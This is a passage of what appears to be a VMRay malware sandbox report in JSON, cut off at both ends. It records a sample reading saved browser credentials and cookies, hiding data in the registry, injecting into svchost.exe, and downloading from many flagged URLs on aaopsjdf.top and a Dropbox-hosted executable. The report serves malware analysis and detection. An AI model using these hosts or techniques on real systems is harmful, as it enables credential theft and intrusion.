\"D3F6CAB61E96B029AD170EEF2C2F89C2\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_credentials", "operation_desc": "Read data related to saved browser credentials", "ref_gfncalls": [ { "ref_id": "gfn_19828", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_credentials", "technique_desc": "Read saved credentials for \"Mozilla Firefox\".", "technique_path": "built_in._browser._browser_data_credentials.vmray_read_browser_credentials", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\login data", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_credentials", "operation_desc": "Read data related to saved browser credentials", "ref_gfncalls": [ { "ref_id": "gfn_20687", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_credentials", "technique_desc": "Read saved credentials for \"Google Chrome\".", "technique_path": "built_in._browser._browser_data_credentials.vmray_read_browser_credentials", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@g.live[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@g.live[1].txt", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_cookies", "operation_desc": "Read data related to browser cookies", "ref_gfncalls": [ { "ref_id": "gfn_22350", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_cookies", "technique_desc": "Read Cookies for \"Microsoft Internet Explorer\".", "technique_path": "built_in._browser._browser_data_cookies.vmray_read_browser_cookies", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_cookies", "operation_desc": "Read data related to browser cookies", "ref_gfncalls": [ { "ref_id": "gfn_22585", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_cookies", "technique_desc": "Read Cookies for \"Mozilla Firefox\".", "technique_path": "built_in._browser._browser_data_cookies.vmray_read_browser_cookies", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\cookies", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_cookies", "operation_desc": "Read data related to browser cookies", "ref_gfncalls": [ { "ref_id": "gfn_22716", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_cookies", "technique_desc": "Read Cookies for \"Google Chrome\".", "technique_path": "built_in._browser._browser_data_cookies.vmray_read_browser_cookies", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_23460", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 516320 byte in \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci\\Eteg\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_23617", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 792144 byte in \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci\\Eteg\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_23747", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 803104 byte in \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci\\Eteg\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_23881", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 822944 byte in \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci\\Eteg\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_create_many_files", "operation_desc": "Create many files", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_many_files", "technique_desc": "Create above average number of files.", "technique_path": "built_in._file_system._create_many_files.vmray_create_many_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_handle_with_malicious_files", "operation_desc": "Handle with malicious files", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_handle_with_malicious_files", "technique_desc": "File \"c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\" is a known malicious file.", "technique_path": "built_in._file_system._handle_with_malicious_files.vmray_handle_with_malicious_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_memory_system", "operation_desc": "Write into memory of another process", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_memory_system", "technique_desc": "\"c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\" modifies memory of \"c:\\windows\\syswow64\\svchost.exe\"", "technique_path": "built_in._injection._modify_memory_system.vmray_modify_memory_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_control_flow_system", "operation_desc": "Modify control flow of another process", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_remote_thread_system", "technique_desc": "\"c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\" creates thread in \"c:\\windows\\syswow64\\svchost.exe\"", "technique_path": "built_in._injection._modify_control_flow_system.vmray_create_remote_thread_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_reputation_url_lookup", "operation_desc": "Reputation URL lookup", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_reputation_url_malicious", "technique_desc": "URL \"aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg\" is known as malicious URL.", "technique_path": "built_in._network._reputation_url_lookup.vmray_reputation_url_malicious", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_reputation_url_lookup", "operation_desc": "Reputation URL lookup", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_reputation_url_malicious", "technique_desc": "URL \"aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/\" is known as malicious URL.", "technique_path": "built_in._network._reputation_url_lookup.vmray_reputation_url_malicious", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_reputation_url_lookup", "operation_desc": "Reputation URL lookup", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_reputation_url_malicious", "technique_desc": "URL \"aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q\" is known as malicious URL.", "technique_path": "built_in._network._reputation_url_lookup.vmray_reputation_url_malicious", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_reputation_url_lookup", "operation_desc": "Reputation URL lookup", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_reputation_url_malicious", "technique_desc": "URL \"aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw\" is known as malicious URL.", "technique_path": "built_in._network._reputation_url_lookup.vmray_reputation_url_malicious", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_reputation_url_lookup", "operation_desc": "Reputation URL lookup", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_reputation_url_malicious", "technique_desc": "URL \"aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA\" is known as malicious URL.", "technique_path": "built_in._network._reputation_url_lookup.vmray_reputation_url_malicious", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_reputation_url_lookup", "operation_desc": "Reputation URL lookup", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_reputation_url_malicious", "technique_desc": "URL \"aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA\" is known as malicious URL.", "technique_path": "built_in._network._reputation_url_lookup.vmray_reputation_url_malicious", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_reputation_url_lookup", "operation_desc": "Reputation URL lookup", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_reputation_url_malicious", "technique_desc": "URL \"aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/\" is known as malicious URL.", "technique_path": "built_in._network._reputation_url_lookup.vmray_reputation_url_malicious", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_reputation_url_lookup", "operation_desc": "Reputation URL lookup", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_reputation_url_malicious", "technique_desc": "URL \"aaopsjdf.top/Yjc2A8Gst/g/2/wqY_IEM-6a_ZPTl/gH/YMg\" is known as malicious URL.", "technique_path": "built_in._network._reputation_url_lookup.vmray_reputation_url_malicious", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_reputation_url_lookup", "operation_desc": "Reputation URL lookup", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_reputation_url_malicious", "technique_desc": "URL \"aaopsjdf.top/IPPKGT6kjF/k1/YZGv/RoQvaE4rDg9/AunIQ\" is known as malicious URL.", "technique_path": "built_in._network._reputation_url_lookup.vmray_reputation_url_malicious", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/bjJ0Il/u/GwDYfpQFveklLDcx/iq/qRQ\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/Yjc2A8Gst/g/2/wqY_IEM-6a_ZPTl/gH/YMg\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/IPPKGT6kjF/k1/YZGv/RoQvaE4rDg9/AunIQ\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"aaopsjdf.top/X8CyRU/gj4KKOFp/LKWt3avl_/H/ijD/A\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": 